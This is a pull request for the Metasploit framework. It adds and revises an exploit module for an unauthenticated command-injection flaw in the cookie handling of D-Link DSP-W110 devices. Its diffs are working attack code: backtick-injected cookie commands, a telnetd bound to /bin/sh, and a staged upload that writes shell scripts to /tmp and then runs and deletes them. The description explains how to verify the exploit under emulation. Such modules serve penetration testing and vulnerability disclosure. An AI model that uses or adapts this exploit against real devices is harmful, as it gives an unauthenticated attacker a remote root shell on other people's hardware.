### PR TITLE
DSP-W110 cookie command injection

### DIFF
--- a/modules/exploits/linux/http/dlink_dspw100_cookie_noauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_dspw100_cookie_noauth_exec.rb
@@ -1,0 +1,119 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::CommandShell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'D-Link Cookie Command Execution',
+      'Description'    => %q{
+        This module exploits an anonymous remote code execution vulnerability on different D-Link
+        devices. The vulnerability is a command injection in the cookie handling process of the
+        lighttpd web server when handling specially crafted cookie values. This module has been
+        successfully tested on D-Link DSP-W110A1_FW105B01 in an emulated environment.
+      },
+      'Author'         =>
+        [
+          'Peter Adkins',   # vulnerability discovery and initial PoC
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'linux',
+      'References'     =>
+        [
+          ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
+        ],
+      'DisclosureDate' => 'Jun 12 2015',
+      'Targets' =>
+        [
+          [ 'Automatic',        { } ]
+        ],
+      'DefaultTarget'    => 0
+      ))
+
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri'    => '/',
+        'method' => 'GET',
+      })
+
+      if res && res.headers["Server"] =~ /lighttpd\/1.4.34/
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the device ...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+    end
+
+    print_status("#{peer} - Exploiting...")
+
+    telnetport = rand(32767) + 32768
+
+    cmd = "telnetd -p #{telnetport}"
+
+    execute_command(cmd)
+
+    handle_telnet(telnetport)
+  end
+
+  def handle_telnet(telnetport)
+
+    begin
+      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+
+      if sock
+        print_good("#{peer} - Backdoor service spawned")
+        add_socket(sock)
+      else
+        fail_with(Failure::Unreachable, "#{peer} - Backdoor service not spawned")
+      end
+
+      print_status "Starting a Telnet session #{rhost}:#{telnetport}"
+      merge_me = {
+        'USERPASS_FILE' => nil,
+        'USER_FILE'     => nil,
+        'PASS_FILE'     => nil,
+        'USERNAME'      => nil,
+        'PASSWORD'      => nil
+      }
+      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
+    rescue
+      fail_with(Failure::Unreachable, "#{peer} - Backdoor service not handled")
+    end
+    return
+  end
+
+  def execute_command(cmd)
+
+    begin
+      res = send_request_cgi({
+        'method'        => 'GET',
+        'uri'           => "/",
+        'cookie'        => "i=`#{cmd}`"
+      }, 5)
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end

--- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
@@ -18,8 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits an anonymous remote upload and code execution vulnerability on different
         D-Link devices. The vulnerability is a command injection in the cookie handling process of the
         lighttpd web server when handling specially crafted cookie values. This module has been
-        successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment and on the real
-        device.
+        successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment.
       },
       'Author'         =>
         [
@@ -39,13 +38,13 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'Targets' =>
         [
-          [ 'MIPS Little Endian',
+          [ 'MIPS Little Endian',  # unknown if there are LE devices out there ... but in case we have a target
             {
               'Platform' => 'linux',
               'Arch'     => ARCH_MIPSLE
             }
           ],
-          [ 'MIPS Big Endian',  # unknown if there are BE devices out there ... but in case we have a target
+          [ 'MIPS Big Endian',
             {
               'Platform' => 'linux',
               'Arch'     => ARCH_MIPSBE
@@ -63,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'method' => 'GET',
       })
 
-      if res && res.headers["Server"] =~ /lighttpd\/1.4.34/
+      if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/
         return Exploit::CheckCode::Detected
       end
     rescue ::Rex::ConnectionError

--- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
@@ -9,7 +9,6 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Auxiliary::CommandShell
 
   def initialize(info = {})
     super(update_info(info,
@@ -33,6 +32,16 @@ class Metasploit3 < Msf::Exploit::Remote
           ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
         ],
       'DisclosureDate' => 'Jun 12 2015',
+      'Platform'       => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Payload'     =>
+        {
+          'Compat'  => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find',
+          },
+        },
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
       'Targets' =>
         [
           [ 'Automatic',        { } ]
@@ -40,6 +49,20 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget'    => 0
       ))
 
+    register_advanced_options(
+      [
+        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
+        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
+      ], self.class)
+
+  end
+
+  def tel_timeout
+    (datastore['TelnetTimeout'] || 10).to_i
+  end
+
+  def banner_timeout
+    (datastore['TelnetBannerTimeout'] || 25).to_i
   end
 
   def check
@@ -76,33 +99,28 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def handle_telnet(telnetport)
 
-    begin
-      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
 
-      if sock
-        print_good("#{peer} - Backdoor service spawned")
-        add_socket(sock)
-      else
-        fail_with(Failure::Unreachable, "#{peer} - Backdoor service not spawned")
-      end
-
-      print_status "Starting a Telnet session #{rhost}:#{telnetport}"
-      merge_me = {
-        'USERPASS_FILE' => nil,
-        'USER_FILE'     => nil,
-        'PASS_FILE'     => nil,
-        'USERNAME'      => nil,
-        'PASSWORD'      => nil
-      }
-      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
-    rescue
-      fail_with(Failure::Unreachable, "#{peer} - Backdoor service not handled")
+    if sock
+      print_good("#{peer} - Backdoor service spawned")
+      add_socket(sock)
+    else
+      fail_with(Failure::Unreachable, "#{peer} - Backdoor service not spawned")
     end
-    return
+
+    print_status("#{peer} - Trying to establish a telnet session...")
+    prompt = negotiate_telnet(sock)
+    if prompt.nil?
+      sock.close
+      fail_with(Failure::Unknown, "#{peer} - Unable to establish a telnet session")
+    else
+      print_good("#{peer} - Telnet session successfully established...")
+    end
+
+    handler(sock)
   end
 
   def execute_command(cmd)
-
     begin
       res = send_request_cgi({
         'method'        => 'GET',
@@ -112,6 +130,23 @@ class Metasploit3 < Msf::Exploit::Remote
       return res
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+
+  # Since there isn't user/password negotiation, just wait until the prompt is there
+  def negotiate_telnet(sock)
+    begin
+      Timeout.timeout(banner_timeout) do
+        while(true)
+          data = sock.get_once(-1, tel_timeout)
+          return nil if not data or data.length == 0
+          if data =~ /\x23\x20$/
+            return true
+          end
+        end
+      end
+    rescue ::Timeout::Error
+      return nil
     end
   end
 end

--- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
@@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
     @counter = 1
     execute_cmdstager(
       :flavor  => :echo,
-      :linemax => 99  #limited by our upload, larger payloads crash the web server
+      :linemax => 95  #limited by our upload, larger payloads crash the web server
     )
 
     print_status("#{peer} - creating payload and executing it ...")
@@ -108,12 +108,13 @@ class Metasploit3 < Msf::Exploit::Remote
     #upload our stager to a shell script
     #upload takes quite long because there is no response from the web server
 
-    data_cmd = "------------------------------9bcdb049f0d2\r\n"
-    data_cmd << "Content-Disposition: form-data; name=\"name\"; filename=\"#{@counter}\"\r\n"
-    data_cmd << "Content-Type: application/octet-stream\r\n\r\n"
-    data_cmd << "#!/bin/sh\n"
-    data_cmd << cmd
-    data_cmd << "\n------------------------------9bcdb049f0d2--"
+    file_upload = "#!/bin/sh\n"
+    file_upload << cmd << "\n"
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(file_upload, nil, "binary", "form-data; name=\"xxx\"; filename=\"#{@counter}\"")
+    post_data.bound = "-9bcdb049f0d2--"
+    file = post_data.to_s
 
     @counter = @counter + 1
 
@@ -121,8 +122,8 @@ class Metasploit3 < Msf::Exploit::Remote
       send_request_cgi({
         'method'        => 'POST',
         'uri'           => "/web_cgi.cgi?&request=UploadFile&path=/tmp/",
-        'ctype'         => "multipart/form-data; boundary=----------------------------9bcdb049f0d2",
-        'data'          => data_cmd
+        'ctype'         => "multipart/form-data; boundary=#{post_data.bound}",
+        'data'          => file
       })
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
@@ -131,6 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def execute_final_command(cmd)
+    fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18
     begin
       send_request_cgi({
         'method'        => 'GET',

--- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
@@ -112,8 +112,8 @@ class Metasploit3 < Msf::Exploit::Remote
     file_upload << cmd << "\n"
 
     post_data = Rex::MIME::Message.new
-    post_data.add_part(file_upload, nil, "binary", "form-data; name=\"xxx\"; filename=\"#{@counter}\"")
-    post_data.bound = "-9bcdb049f0d2--"
+    post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"")
+    post_data.bound = "-#{rand_text_alpha(12)}--"
     file = post_data.to_s
 
     @counter = @counter + 1
@@ -121,7 +121,12 @@ class Metasploit3 < Msf::Exploit::Remote
     begin
       send_request_cgi({
         'method'        => 'POST',
-        'uri'           => "/web_cgi.cgi?&request=UploadFile&path=/tmp/",
+        'uri'           => "/web_cgi.cgi",
+        'vars_get' => {
+          '&request' =>'UploadFile',
+          'path' => '/tmp/',
+        },
+        'encode_params' => false,
         'ctype'         => "multipart/form-data; boundary=#{post_data.bound}",
         'data'          => file
       })
@@ -132,6 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def execute_final_command(cmd)
+    #very limited space - larger commands crash the webserver
     fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18
     begin
       send_request_cgi({

--- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
@@ -18,11 +18,12 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits an anonymous remote code execution vulnerability on different D-Link
         devices. The vulnerability is a command injection in the cookie handling process of the
         lighttpd web server when handling specially crafted cookie values. This module has been
-        successfully tested on D-Link DSP-W110A1_FW105B01 in an emulated environment.
+        successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment and on the real
+        device.
       },
       'Author'         =>
         [
-          'Peter Adkins',   # vulnerability discovery and initial PoC
+          'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC
           'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
         ],
       'License'        => MSF_LICENSE,
@@ -67,12 +68,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status("#{peer} - Exploiting...")
 
-    telnetport = rand(32767) + 32768
-
-    cmd = "telnetd -p #{telnetport}"
-
+    cmd = "telnetd -l/bin/sh"
     execute_command(cmd)
-
+    telnetport = 23
     handle_telnet(telnetport)
   end
 

--- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
+++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
@@ -9,13 +9,14 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'D-Link Cookie Command Execution',
       'Description'    => %q{
-        This module exploits an anonymous remote code execution vulnerability on different D-Link
-        devices. The vulnerability is a command injection in the cookie handling process of the
+        This module exploits an anonymous remote upload and code execution vulnerability on different
+        D-Link devices. The vulnerability is a command injection in the cookie handling process of the
         lighttpd web server when handling specially crafted cookie values. This module has been
         successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment and on the real
         device.
@@ -32,37 +33,27 @@ class Metasploit3 < Msf::Exploit::Remote
           ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
         ],
       'DisclosureDate' => 'Jun 12 2015',
-      'Platform'       => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Payload'     =>
+      'Payload'        =>
         {
-          'Compat'  => {
-            'PayloadType'    => 'cmd_interact',
-            'ConnectionType' => 'find',
-          },
+          'DisableNops' => true
         },
-      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
       'Targets' =>
         [
-          [ 'Automatic',        { } ]
+          [ 'MIPS Little Endian',
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSLE
+            }
+          ],
+          [ 'MIPS Big Endian',  # unknown if there are BE devices out there ... but in case we have a target
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSBE
+            }
+          ],
         ],
-      'DefaultTarget'    => 0
+      'DefaultTarget'    => 1
       ))
-
-    register_advanced_options(
-      [
-        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
-        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
-      ], self.class)
-
-  end
-
-  def tel_timeout
-    (datastore['TelnetTimeout'] || 10).to_i
-  end
-
-  def banner_timeout
-    (datastore['TelnetBannerTimeout'] || 25).to_i
   end
 
   def check
@@ -89,64 +80,66 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
     end
 
-    print_status("#{peer} - Exploiting...")
+    print_status("#{peer} - Uploading stager ...")
+    @counter = 1
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 99  #limited by our upload, larger payloads crash the web server
+    )
 
-    cmd = "telnetd -l/bin/sh"
-    execute_command(cmd)
-    telnetport = 23
-    handle_telnet(telnetport)
+    print_status("#{peer} - creating payload and executing it ...")
+
+    (1 .. @counter).each do |act_file|
+      #the http server blocks access to our files ... we copy it to a new one
+      #the length of our command is restricted to 19 characters
+      cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}"
+      execute_final_command(cmd)
+      cmd = "chmod +x /tmp/#{act_file+@counter}"
+      execute_final_command(cmd)
+      cmd = "/tmp/#{act_file+@counter}"
+      execute_final_command(cmd)
+      cmd = "rm /tmp/#{act_file}"
+      execute_final_command(cmd)
+      cmd = "rm /tmp/#{act_file+@counter}"
+      execute_final_command(cmd)
+    end
   end
 
-  def handle_telnet(telnetport)
+  def execute_command(cmd,opts)
+    #upload our stager to a shell script
+    #upload takes quite long because there is no response from the web server
 
-    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+    data_cmd = "------------------------------9bcdb049f0d2\r\n"
+    data_cmd << "Content-Disposition: form-data; name=\"name\"; filename=\"#{@counter}\"\r\n"
+    data_cmd << "Content-Type: application/octet-stream\r\n\r\n"
+    data_cmd << "#!/bin/sh\n"
+    data_cmd << cmd
+    data_cmd << "\n------------------------------9bcdb049f0d2--"
 
-    if sock
-      print_good("#{peer} - Backdoor service spawned")
-      add_socket(sock)
-    else
-      fail_with(Failure::Unreachable, "#{peer} - Backdoor service not spawned")
-    end
+    @counter = @counter + 1
 
-    print_status("#{peer} - Trying to establish a telnet session...")
-    prompt = negotiate_telnet(sock)
-    if prompt.nil?
-      sock.close
-      fail_with(Failure::Unknown, "#{peer} - Unable to establish a telnet session")
-    else
-      print_good("#{peer} - Telnet session successfully established...")
-    end
-
-    handler(sock)
-  end
-
-  def execute_command(cmd)
     begin
-      res = send_request_cgi({
+      send_request_cgi({
+        'method'        => 'POST',
+        'uri'           => "/web_cgi.cgi?&request=UploadFile&path=/tmp/",
+        'ctype'         => "multipart/form-data; boundary=----------------------------9bcdb049f0d2",
+        'data'          => data_cmd
+      })
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+
+  end
+
+  def execute_final_command(cmd)
+    begin
+      send_request_cgi({
         'method'        => 'GET',
         'uri'           => "/",
         'cookie'        => "i=`#{cmd}`"
       }, 5)
-      return res
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
-    end
-  end
-
-  # Since there isn't user/password negotiation, just wait until the prompt is there
-  def negotiate_telnet(sock)
-    begin
-      Timeout.timeout(banner_timeout) do
-        while(true)
-          data = sock.get_once(-1, tel_timeout)
-          return nil if not data or data.length == 0
-          if data =~ /\x23\x20$/
-            return true
-          end
-        end
-      end
-    rescue ::Timeout::Error
-      return nil
     end
   end
 end


### PR DESCRIPTION
This is a new module for the vulnerability on the Dlink DSP W110 device. It was discovered by Peter Adkins - @darkarnium (https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110). Because of the very limited space we can only start a telnetd on the default port.

![telnet_session_msf](https://cloud.githubusercontent.com/assets/497520/8147538/b68bdf16-126f-11e5-9060-3424ff50318e.png)

You can verify the module within qemu:
- Firmware: ftp://ftp.dlinkla.com/pub/DSP-W110/
- Binwalk it
- mkdir var/run
- copy it to your debian MIPS machine and start the webserver:
  root@debian-mips:~/dspw110_rootfs# chroot . ./usr/bin/lighttpd -f ./mnt/lighttpd/lighttpd.conf -D
- exploit it

The telnetd was not fully working in emulation! Peter has tested the module on the real device.
